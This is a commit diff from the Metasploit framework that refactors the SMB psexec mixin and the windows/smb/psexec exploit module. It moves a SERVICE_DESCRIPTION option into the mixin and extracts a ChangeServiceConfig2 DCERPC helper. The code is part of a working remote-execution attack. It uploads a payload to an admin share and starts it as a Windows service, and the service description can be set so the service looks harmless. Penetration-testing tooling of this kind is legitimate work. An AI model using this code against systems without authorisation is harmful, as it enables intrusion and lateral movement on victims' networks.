Refactor to new psexec style

Author: Meatballs1

lib/msf/core/exploit/smb/psexec.rb

@@ -26,6 +26,7 @@ def initialize(info = {})
       [
         OptString.new('SERVICE_NAME', [ false, 'The service name', nil]),
         OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
       ], self.class)
   end
 
@@ -39,6 +40,10 @@ def display_name
     @display_name ||= rand_text_alpha(16)
   end
 
+  def service_description
+    @service_description ||= datastore['SERVICE_DESCRIPTION']
+  end
+
   # Retrives output from the executed command
   #
   # @param smbshare [String] The SMBshare to connect to.  Usually C$
@@ -164,6 +169,25 @@ def close_service_handle(svc_handle)
     svc_status
   end
 
+  def change_service_description(svc_handle, service_description)
+    svc_status = nil
+    stubdata =
+      svc_handle +
+      NDR.long(1) + # dwInfoLevel = SERVICE_CONFIG_DESCRIPTION
+      NDR.long(1) + # lpInfo -> *SERVICE_DESCRIPTION
+      NDR.long(0x0200) + # SERVICE_DESCRIPTION struct
+      NDR.long(0x04000200) +
+      NDR.wstring(service_description)
+    begin
+      response = dcerpc.call(0x25, stubdata) # ChangeServiceConfig2
+      svc_status = response.unpack('V').first
+    rescue Rex::Proto::DCERPC::Exceptions::Fault => e
+      print_error("#{peer} - Error changing service description : #{e}")
+    end
+
+    svc_status
+  end
+
   # Executes a single windows command.
   #
   # If you want to retrieve the output of your command you'll have to
@@ -176,7 +200,7 @@ def close_service_handle(svc_handle)
   # @param command [String] Should be a valid windows command
   # @param disconnect [Boolean] Disconnect afterwards
   # @return [Boolean] Whether everything went well
-  def psexec(command, disconnect=true, servicedescription=nil)
+  def psexec(command, disconnect=true)
     simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
     handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
     vprint_status("#{peer} - Binding to #{handle} ...")
@@ -214,18 +238,7 @@ def psexec(command, disconnect=true, servicedescription=nil)
 
       if service_description
         vprint_status("#{peer} - Changing service description...")
-        stubdata =
-          svc_handle +
-          NDR.long(1) + # dwInfoLevel = SERVICE_CONFIG_DESCRIPTION
-          NDR.long(1) + # lpInfo -> *SERVICE_DESCRIPTION
-          NDR.long(0x0200) + # SERVICE_DESCRIPTION struct
-          NDR.long(0x04000200) +
-          NDR.wstring(service_description)
-        begin
-          response = dcerpc.call(0x25, stubdata) # ChangeServiceConfig2
-        rescue Rex::Proto::DCERPC::Exceptions::Fault => e
-          print_error("#{peer} - Error changing service description : #{e}")
-        end
+        change_service_description(svc_handle, service_description)
       end
 
       vprint_status("#{peer} - Starting the service...")

modules/exploits/windows/smb/psexec.rb

@@ -80,7 +80,6 @@ def initialize(info = {})
         OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
         OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
         OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
-        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
       ], self.class)
   end
 
@@ -151,8 +150,6 @@ def exploit
       # Disconnect from the ADMIN$
       simple.disconnect("ADMIN$")
     else
-      servicedescription = datastore['SERVICE_DESCRIPTION']
-
       # Upload the shellcode to a file
       print_status("Uploading payload...")
       smbshare = datastore['SHARE']
@@ -197,7 +194,7 @@ def exploit
         file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
       end
 
-      psexec(file_location, false, servicedescription)
+      psexec(file_location, false)
 
       print_status("Deleting \\#{filename}...")
       sleep(1)